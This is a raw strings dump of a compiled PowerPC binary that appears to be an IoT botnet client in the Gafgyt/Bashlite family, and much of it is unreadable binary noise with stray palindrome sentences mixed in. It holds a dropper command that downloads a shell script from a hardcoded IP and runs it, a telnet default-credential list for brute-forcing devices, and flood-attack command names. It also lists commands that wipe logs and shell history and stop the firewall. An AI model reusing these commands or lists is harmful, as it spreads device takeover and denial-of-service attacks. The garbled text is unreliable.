9)E|
78	y
9)E|
=)<o8	
9)E|
9)E|T
:} J
9)E|T
:} J
9)E|U@
:} J
}a[xN
9@I^
)Al8	
	Al= 
	Al= 
9)E|T
:} J
Cx= 
	Ah|
}@Sx= 
	Ah|
)Ah8	
	Ah= 
}`HP= 
9)E|U@
:} J
9)E|U@
:} J
}a[xN
HP|	
HP|	
}a[xN
}a[xN
}a[xN
}a[xN
0} Z
>} KxT
>} KxT
>} KxT
>} KxT
>} KxT
>} KxT
}a[xN
}a[xN
}a[xN
}%KxH
x}d[x}%KxK
}a[xN
z9|`
:}#Kx8
we|`
}a[xN
x}%KxH
x}$Kx8
{	|`
{u|i
}a[xN
xa|`
}a[xN
:} J
}a[xN
}c[x|
}c[x|
}a[xN
}a[xN
}a[xN
x}$KxH
}%KxH
}a[xN
}%KxH
}a[xN
} HP
}a[xN
}%KxH
:} J
H0}k
x}$Kx8
}f[x}GSxH
:} J
H0}k
x}$Kx8
}f[x}GSxH
x}$Kx8
}a[xN
}c[x|
:} J
H0}k
}%Kx8
}g[xH
l!|`
x}'KxH
}a[xN
:}ISx8	
}@SxT
}a[xN
}a[xN
} HP
} HP
} HP
} HP
} HP
}a[xN
:} J
H0}k
x}$Kx8
}g[xH
e!|`
}a[xN
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>p} 
p}`XP
} HP
>}CSx}
;x}&Kx}g[x|
}a[xN
}a[xN
>} Kx|
}a[xN
}q|`
}a[xN
}a[xN
}a[xN
}#Kx8
}%KxH
}%KxH
}q|k
}&Kx8
}&Kx8
x}$Kx8
WE|i
:} J
H0}k
}%Kx8
}g[xH
}&Kx}g[xH
}%KxH
R%|`
>}c[x= 
}HSx9 
}%KxH
Pe|`
:} J
:} J
NQ|`
>}c[x= 
}HSx9 
:} J
:} J
}e[x}FSx|
}%KxH
gQ|`
KQ|`
:} J
:} J
cq|`
I=|`
>}c[x= 
}HSx9 
}%KxH
}%KxH
}%KxH
Fi|`
E=|`
}%KxH
de|k
:} J
:} J
 <}e[x}FSx|
:} J
:} J
 d}e[x}FSx|
ga|`
A-|`
mQ|`
x}e[x8
>}c[x|
?]|i
}'Kx9
^]|`
>}c[x|
>M|`
}a[xN
^q|`
}CSx|
x}e[xH
])|`
a5|i
}a[xN
<u|i
p}`XP
$} HP
9)@$
:} J
,}h[xL
x}%KxH
;Y|`
}a[xN
[A|`
Zm|`
`a|`
:Y|`
}a[xN
Yy|`
_5|`
X)|k
x}e[x8
O}|`
OI|`
Um|`
>}c[x|
5I|i
}'Kx9
>}c[x|
4I|`
}a[xN
0I|`
S]|`
}#Kx8
}%KxH
8} J
8} J
8} J
8} J
,=|`
8} J
x}$Kx8
2q|i
8} J
8} J
:} J
8} J
8} J
H0}k
8} J
}%Kx8
}g[xH
/Y|`
8} J
}&Kx}g[xH
8} J
8} J
8} J
8} J
8} J
8} J
TU|i
8} J
8} J
}a[xN
T!|`
.=|`
}CSx}d[x|
}#Kx|
x}e[xH
$} HP
QQ8`
L1|`
}#Kx8
}%KxH
8} J
8} J
8} J
8} J
8} J
x}$Kx8
+E|i
8} J
8} J
:} J
8} J
8} J
H0}k
8} J
}%Kx8
}g[xH
(-|`
8} J
}&Kx}g[xH
8} J
8} J
8} J
8} J
8} J
:} J
8} J
8} J
H0}k
8} J
}&Kx}g[xH
&A|`
8} J
8} J
}a[xN
F-|`
>M|`
"}= 
!	|`
;=|`
Ui|`
U5|`
?=|`
T	|i
Sq|`
S=|`
S!|`
7y|`
==|`
Q9|`
Pi|`
P5|`
:=|`
O	|`
N}|`
31|`
3u|`
M}|`
M]|`
M)|`
7!|`
K]|`
K)|`
/9|`
/]|`
.-|`
8i$,H
8i$<H
8i$HH
8i$`H
8i$tH
}a[xN
}%KxH
:} J
}c[x|
+}|i
+U|`
9m|`
x}$Kx
}a[xN
3%|`
2a|`
x}%KxH
}%KxH
x}$KxH
}a[xN
}a[xN
=a8`
:}ISx8	
#u|`
#M|`
}%KxH
 != 
x}$Kx
9)%$8
x}$KxK
}%KxH
x}#Kx8
x}$KxH
x}$Kx8
}#Kx}e[x8
+x}%KxD
|cJ.Tc
8cE<N
Tc@.
Tc@.
8cAp
+x8a
+x|}
;1|`
}#Kx
8} J
W9)+`}+J
x8c+T|{
8})B
8})B
})XP=`
p9k+
:}'R
}^Sx/
<|	:.
}^SxH
}KSx;@
}KSx
9i+h
9)+h})XP/
}#Kx
}	Cx
\})@P/
}eXP= 
<9)+
9)+|9
}z[x9!
#x9c
QJD.QJ
}H2x9k
}JZx9)
@x9#
}#KxN
}c[xN
}CSxN
} @9A
(P5%
}	CxH
}ISxH
}#Kx|j
}+Kx`
} 899+
}#Kx|j
}*Kx
} HP;
@,|}
,}+I
:}yZ
}#Kx8!
:} B
4}#Kx
H81 
 0})
 >})
x8zD
	E,|}
}KSx
}KSx
}*HP
}CSx
 }CSx}e[x
}CSx}e[x
}e[x}CSx
x}$Kx
9)7X
}`XP+
:}iS
}+HPU)
:}#J
3x8!
akNm
9)09U)
}FSx}i
|`HQ@
$9i7X+
$8c7
<|	R.p	
	E /
:}`:
}a[xN
:} :
:} B
}iXP
	E0/
	E4/
x8c7
	E,A
+E$9E
	E4|
#x|y
E(8a
=E(H
iE,/
}iXP= 
Beeb
iE0H
:9)@
}iXP;
:9)@
8cE@N
+x8!
P} HP
|	 9@
@}l;
`P}l[x}
})0P})Z
<`C0
}h0P
})PP|
(}^"
@}fHP
}jXP
0}*XP
alula
})XP|
L|	Z
}`(P
Jx=i~
})Zx|
Hy9#
}#KxN
}CSxN
}c[xN
Jx9C
})Zx9c
Hy9#
}#KxN
}c[xN
}CSxN
<|	:.p	
<}@Z
|	:.p	
iED= 
)Dd|
@XPK
 I|{
}8HP
	EH/
8D8c80
x8c8HH
J.p	
Cx;`
 |	Z.p	
J.p	
|EH|i
EL9 
=EL/
~EL|i
x}g[x8`
+x|}
}$Kx
	EP/
	EP?
	EP/
	EPK
:})B
	EP/
	EPK
	ET= 
	EXN
dE\|
#x9@
})PP9I
}@PPq`
p}J(
H89)
 6})
UTc@.
+x||
Ap8a
xp	 
Jx=i~
})Zx9c
Hy9#
}#KxN
}c[xN
}CSxN
}CSxN
x;)8
 6}<
D}#Kx
	8|8
}h[x9k
0}*+
} HP9)
(}h[xH
 }*+
} HP9)
} HP9)
D}#Kx
}i[x;
}<Kx
x}<Kx/
}#Kx
3xU)
}JCx9)
Sx})[x})
[x9|
;xU)@.})
	U)@.
8D8c8
;x}QSx
} HP
J.p	
J.p	
}DSx
<})R
} HQ@
}#KxN
x|}Z
}|[x:
|	 9@
cd /tmp; wget http://51.15.56.255/qtvd.sh; sh qtvd.sh; rm -rf qtvd.sh
51.15.56.255:23
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1
Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)
Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4
Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201
Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911
Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)
Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7
Mozilla/5.0 (PLAYSTATION 3; 3.55)
Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2
wii libnup/1.0
Mozilla/4.0 (PSP (PlayStation Portable); 2.00)
PSP (PlayStation Portable); 2.00
Bunjalloo/0.7.6(Nintendo DS;U;en)
Doris/1.15 [en] (Symbian)
BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1
BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100
Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16
Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01
Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; uZardWeb/1.0; Server_JP)
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 Skyfire/2.0
SonyEricssonW800i/R1BD001/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20110517 Firefox/5.0 Fennec/5.0
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)
MOT-V300/0B.09.19R MIB/2.2 Profile/MIDP-2.0 Configuration/CLDC-1.0
Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0
Mozilla/5.0 (compatible; Teleca Q7; Brew 3.1.5; U; en) 480X800 LGE VX11000
MOT-L7/08.B7.ACR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1
root
admin
user
login
guest
support
netgear
cisco
ubnt
telnet
Administrator
comcast
default
password
D-Link
manager
VTech
vagrant
123456
changeme
1234
raspberry
vagrant
, 123
12345
dreambox
test
(null)
buf: %s
/bin/sh
/proc/cpuinfo
BOGOMIPS
PING
:>%$#
%d.%d.%d.%d
ogin:
assword:
[RAZOR] 
[34mATTEMPT 
[37m-> %s:%s:%s
ncorrect
[RAZOR] 
[32mEXECUTED 
[37m-> %s:%s:%s
[RAZOR] 
[31mUNSUCCESSFUL 
[37m-> %s:%s:%s
%s %s HTTP/1.1
Host: %s
User-Agent: %s
Connection: close
arfgG
HBiug655
KJYDFyljf754
LIKUGilkut769458905
JHFDSkgfc5747694
GJjyur67458
RYSDk747586
HKJGi5r8675
KHGK7985i
yuituiILYF
GKJDghfcjkgd4
uygtfgtrevf
tyeuhygbtfvg
ewqdcftr
trbazetghhnbrty
tbhrwsehbg
twehgbferhb
etrbhhgetrb
edfverthbyrtb
kmiujmnhnhfgn
zcdbvgdfsbgfd
gdfbtsdgb
ghdugffytsdyt
tgerthgwtrwry
yteytietyue
qsortEQS
8969876hjkghblk
smack
cunts
PONG!
GETLOCALIP
My IP: %s
SCANNER
SCANNER ON | OFF
STOPPING TELNET SCANNER
STARTING TELNET SCANNER
STD <target> <port> <time>
KILLATTK
GTFOFAG
FATCOCK
rm -rf /var/log/wtmp
rm -rf /tmp/*
history -c
rm -rf ~/.bash_history
rm -rf /bin/netstat
history -w
killall -9 perl
service iptables stop
8.8.8.8
/proc/net/route
	00000000	
RAZER
/usr/sbin/dropbear
BUILD %s
BUILD %s
PONG
DUPPP
%s 2>&1
(nil)
(null)
hlLjztqZ
npxXoudifFeEgGaACScs
 +0-#'I
Unknown error 
Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Exec format error
Bad file descriptor
No child processes
Resource temporarily unavailable
Cannot allocate memory
Permission denied
Bad address
Block device required
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Inappropriate ioctl for device
Text file busy
File too large
No space left on device
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical argument out of domain
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
Too many levels of symbolic links
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Do nine men interpret Nine men I nod
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Value too large for defined data type
Name not unique on network
File descriptor in bad state
Remote address changed
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Streams pipe error
Too many users
Socket operation on non-socket
Destination address required
Message too long
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported by protocol
Address already in use
Cannot assign requested address
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
No buffer space available
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
?/bin/sh
/dev/null
 Nnk(A 
/etc/resolv.conf
/etc/config/resolv.conf
nameserver
domain
search
God A red nugget A fat egg under a dog
0123456789abcdef
/etc/hosts
/etc/config/hosts
S[kA
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
Degas are we not drawn onward no In union drawn onward to new eras aged
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.symtab
.strtab
.shstrtab
.init
.text
.fini
.rodata
.eh_frame
.ctors
.dtors
.jcr
.data
.sdata
.sbss
.bss
.comment
initfini.c
libc/sysdeps/linux/powerpc/crti.S
crtstuff.c
__CTOR_LIST__
__DTOR_LIST__
__EH_FRAME_BEGIN__
__JCR_LIST__
completed.3069
p.3067
__do_global_dtors_aux
call___do_global_dtors_aux
object.3150
frame_dummy
call_frame_dummy
__CTOR_END__
__DTOR_END__
__FRAME_END__
__JCR_END__
__do_global_ctors_aux
call___do_global_ctors_aux
libc/sysdeps/linux/powerpc/crtn.S
libc/sysdeps/linux/powerpc/crt1.S
priv.c
i.4239
printchar
prints
printi
print
fdopen_pids
hextable
C.383.6504
ipState
ioctl.c
libc/sysdeps/linux/powerpc/vfork.S
__syscall_fcntl.c
__syscall_fcntl64.c
_exit.c
chdir.c
close.c
dup2.c
fork.c
getdtablesize.c
getpid.c
getrlimit.c
kill.c
open.c
pipe.c
prctl.c
read.c
select.c
setsid.c
sigprocmask.c
time.c
waitpid.c
write.c
isspace.c
toupper.c
__C_ctype_b.c
__C_ctype_toupper.c
__errno_location.c
printf.c
sprintf.c
vsnprintf.c
_stdio.c
_stdio_streams
__stdio_mutex_initializer.3862
_fixed_buffers
_wcommit.c
vfprintf.c
_vfprintf_internal.c
_charpad
_fp_out_narrow
spec_base.4073
prefix.4074
_ppfs_init.c
_ppfs_prepargs.c
_ppfs_setargs.c
_ppfs_parsespec.c
_promoted_size
type_codes
type_sizes
spec_flags.4074
qual_chars.4079
spec_chars.4075
spec_ranges.4076
spec_or_mask.4077
spec_and_mask.4078
fputs_unlocked.c
fwrite_unlocked.c
memcpy.c
memset.c
strchr.c
strcmp.c
strcpy.c
strlen.c
strncpy.c
strnlen.c
strstr.c
__glibc_strerror_r.c
__xpg_strerror_r.c
unknown.1128
_string_syserrmsgs.c
bcopy.c
strtok.c
next_start.1106
isatty.c
tcgetattr.c
tcsetattr.c
ntohl.c
inet_ntoa.c
buf.2641
inet_makeaddr.c
gethostbyname.c
h.4864
buf.4865
gethostbyname_r.c
connect.c
getsockname.c
getsockopt.c
recv.c
send.c
sendto.c
setsockopt.c
socket.c
sigaddset.c
sigempty.c
signal.c
sigsetops.c
malloc.c
initial_fa
free.c
heap_alloc.c
heap_free.c
__heap_link_free_area
__heap_link_free_area_after
rand.c
random.c
mylock
unsafe_state
randtbl
random_r.c
random_poly_info
system.c
atol.c
strtol.c
_stdlib_strto_l.c
exit.c
execl.c
sleep.c
__uClibc_main.c
__pthread_return_0
__pthread_return_void
__check_one_fd
been_there_done_that.2829
__syscall_error.c
__socketcall.c
execve.c
getegid.c
geteuid.c
getgid.c
getuid.c
nanosleep.c
sbrk.c
wait4.c
errno.c
__h_errno_location.c
wcrtomb.c
wcsrtombs.c
wcsnrtombs.c
Tacocat
_WRITE.c
_fwrite.c
_trans2w.c
_load_inttype.c
_store_inttype.c
_uintmaxtostr.c
_fpmaxtostr.c
exp10_table
memmove.c
memchr.c
mempcpy.c
memrchr.c
strtok_r.c
strpbrk.c
inet_aton.c
dnslookup.c
static_ns
static_id
opennameservers.c
get_hosts_byname_r.c
sigaction.c
abort.c
been_there_done_that
dl-support.c
libc/sysdeps/linux/powerpc/brk.S
__syscall_rt_sigaction.c
poll.c
fclose.c
fopen.c
fseeko.c
fseeko64.c
_adjust_pos.c
_fopen.c
_cs_funcs.c
fgets.c
fflush_unlocked.c
fgets_unlocked.c
rawmemchr.c
strncat.c
strspn.c
strdup.c
ntop.c
inet_pton4
xdigits.3080
inet_ntop4
encodeh.c
decodeh.c
encodeq.c
lengthq.c
decodea.c
read_etc_hosts_r.c
raise.c
llseek.c
tolower.c
__C_ctype_tolower.c
fgetc_unlocked.c
strcasecmp.c
encoded.c
decoded.c
lengthd.c
_READ.c
_rfill.c
_trans2r.c
__fini_array_end
__fini_array_start
__init_array_end
__preinit_array_end
__init_array_start
__preinit_array_start
__read_etc_hosts_r
__GI_execve
__libc_sigaction
strcpy
__GI_fcntl64
recvLine
__GI_sigaddset
__socketcall
__GI___ctype_b
__GI_memchr
__GI___glibc_strerror_r
waitpid
__open_nameservers
__GI_fopen
getrlimit
ioctl
_stdio_openlist_use_count
__GI_initstate_r
__GI_sigaction
strtok_r
__GI___C_ctype_toupper_data
__GI_time
getgid
printf
stdout
random
__GI_strdup
getdtablesize
__GI_h_errno
__length_question
__GI___ctype_toupper
__GI_strcasecmp
__GI_tolower
recv
connect
__encode_question
__GI___uClibc_fini
numpids
__encode_header
__GI_strncat
sigemptyset
__pthread_mutex_lock
initConnection
__sigdelset
__uClibc_fini
memrchr
geteuid
inet_pton
__GI_vsnprintf
__GI_setsid
memmove
sendTCP
__bsd_signal
__GI_strpbrk
__stdio_trans2r_o
__GI_setsockopt
__libc_stack_end
__GI_fclose
__GI_wcsnrtombs
__GI_pipe
_uintmaxtostr
__libc_fcntl
atol
_h_errno
getRandomPublicIP
getc_unlocked
__ctype_b
__GI_random_r
usernames
errno
getegid
__GI_sbrk
zprintf
__GI___uClibc_init
execve
getpid
__GI_lseek64
setstate_r
fgets
getHost
__libc_getpid
wildString
__xpg_strerror_r
__heap_free
fcntl64
prctl
memcpy
makeRandomStr
getRandomIP
__GI_fputs_unlocked
execl
__GI_fgets
sendHTTP
creat
_stdio_openlist_dec_use
sclose
__libc_select
_ppfs_init
__GI___C_ctype_toupper
__GI_fgetc_unlocked
__libc_nanosleep
trim
__GI_fgets_unlocked
dup2
__pthread_mutex_init
tolower
getuid
system
__open_etc_hosts
malloc
isatty
sleep
__GI_atol
vsnprintf
__dns_lookup
__GI_read
uastrings
__C_ctype_tolower
random_r
__dso_handle
__malloc_heap_lock
gethostbyname_r
tcpcsum
fdpclose
socket
__GI_dup2
select
_pthread_cleanup_pop_restore
__GI_wcrtomb
__GI___libc_fcntl
__GI_memset
isspace
__stdio_seek
mempcpy
__GI_strcoll
__GI_write
__ctype_toupper
__libc_read
_string_syserrmsgs
__GI_open
__GI_strchr
__searchdomain
__malloc_heap
sigaddset
__GI_tcgetattr
__environ
wcsnrtombs
makeIPPacket
sockprintf
__GI_inet_ntoa
send
__fgetc_unlocked
abort
__GI_fcntl
__GI_wcsrtombs
__GI_fwrite_unlocked
__GI_getgid
srandom_r
_init
__GI_inet_ntoa_r
__GI_setstate_r
parseHex
strtol
pipe
__libc_lseek64
strnlen
rawmemchr
__GI_mempcpy
__GI___C_ctype_b_data
__sigaddset
nanosleep
__GI_send
h_errno
__pthread_mutex_unlock
wait4
__GI_exit
__app_fini
csum
__exit_cleanup
__GI_execl
__GI_srandom_r
__GI___ctype_tolower
write
environ
__GI_close
getBuild
__resolv_lock
kill
fputs_unlocked
__pthread_mutex_trylock
__GI_brk
__GI_nanosleep
__GI_strtok
_stdio_openlist
__GI_sigprocmask
inet_addr
ntohl
__GI_fseek
__deregister_frame_info
ourIP
chdir
fseeko
_stdio_openlist_del_count
connectTimeout
__raise
setsockopt
bsd_signal
fseek
__GI_kill
__GI_strcmp
__GI_memmove
sendSTD
setstate
__decode_dotted
__stdio_READ
memchr
__GI_toupper
__pthread_initialize_minimal
__GI_recv
__stdin
stdin
__GI_isatty
_start
strstr
__GI_ioctl
init_rand
rand
signal
read
__decode_header
_SDA_BASE_
getCores
__GI___h_errno_location
__GI_memcpy
strcoll
wcsrtombs
_stdio_user_locking
strncpy
strcasecmp
htonl
sendto
__C_ctype_toupper
StartTheLelz
__GI___C_ctype_b
__GI_tcsetattr
__GI_gethostbyname_r
__GI_strncpy
__libc_send
__GI___xpg_strerror_r
currentServer
__GI___C_ctype_tolower
__GI_getrlimit
bcopy
__GI_strcpy
__GI_inet_ntop
strtok
__stdio_adjust_position
__GI_poll
_vfprintf_internal
fork
__stdio_rfill
strncat
gotIP
__GI_sleep
sigaction
__GI_gethostbyname
_dl_phdr
__GI_getc_unlocked
__GI___libc_fcntl64
__uClibc_init
_store_inttype
__length_dotted
__GI_random
__syscall_error
__uclibc_progname
__GI_getegid
__GI_wait4
__uClibc_main
sbrk
__rtld_fini
__GI_fork
strdup
__libc_close
__GI_getpid
inet_aton
index
_pthread_cleanup_push_defer
processCmd
__sigismember
fopen
__bss_start
__libc_open
getOurIP
memset
__GI_socket
main
__glibc_strerror_r
listFork
__GI___C_ctype_tolower_data
__stdio_fwrite
negotiate
srand
initstate
fclose
__syscall_rt_sigaction
ntohs
sendUDP
inet_ntoa
tcgetattr
__C_ctype_tolower_data
time
__libc_system
__GI_abort
poll
fdpopen
__get_hosts_byname_r
__stdio_init_mutex
__GI__exit
strcmp
__nameserver
Borrow or rob
data_start
__h_errno_location
matchPrompt
__C_ctype_b_data
__GI_inet_pton
gethostbyname
_stdio_fopen
_fini
__GI_chdir
__vfork
__malloc_sbrk_lock
sprintf
fdgets
strerror_r
__GI_select
__libc_waitpid
socket_connect
__GI_waitpid
_stdio_term
__GI_vfprintf
__decode_answer
__GI_signal
stderr
commServer
vfork
__C_ctype_b
srandom
_ppfs_setargs
__GI_sendto
__GI_sigemptyset
__GI_printf
__libc_fork
__atexit_lock
scanPid
rand_cmwc
__libc_fcntl64
getsockopt
__GI_fseeko64
fflush_unlocked
__stdio_wcommit
__GI___fgetc_unlocked
__nameservers
fwrite_unlocked
inet_ntoa_r
__pagesize
_stdio_openlist_add_lock
__GI_getdtablesize
_edata
__stdout
__GI_memrchr
__GI_fflush_unlocked
__GI_strstr
__searchdomains
_end
htons
_sigintr
_ppfs_prepargs
__GI_strspn
fgetc_unlocked
initstate_r
__GI_connect
__curbrk
__libc_poll
_dl_phnum
_fpmaxtostr
__errno_location
uppercase
_stdlib_strto_l
__GI___libc_open
exit
__stdio_WRITE
_stdio_init
__GI_geteuid
__heap_alloc
inet_ntop
__C_ctype_toupper_data
_dl_aux_init
sendJUNK
_errno
atoi
_stdio_openlist_del_lock
__GI_inet_aton
fgets_unlocked
_exit
szprintf
strspn
__libc_recv
__libc_creat
Eleele
strlen
lseek64
open
toupper
__libc_write
_ppfs_parsespec
__GI_strtol
__GI_getuid
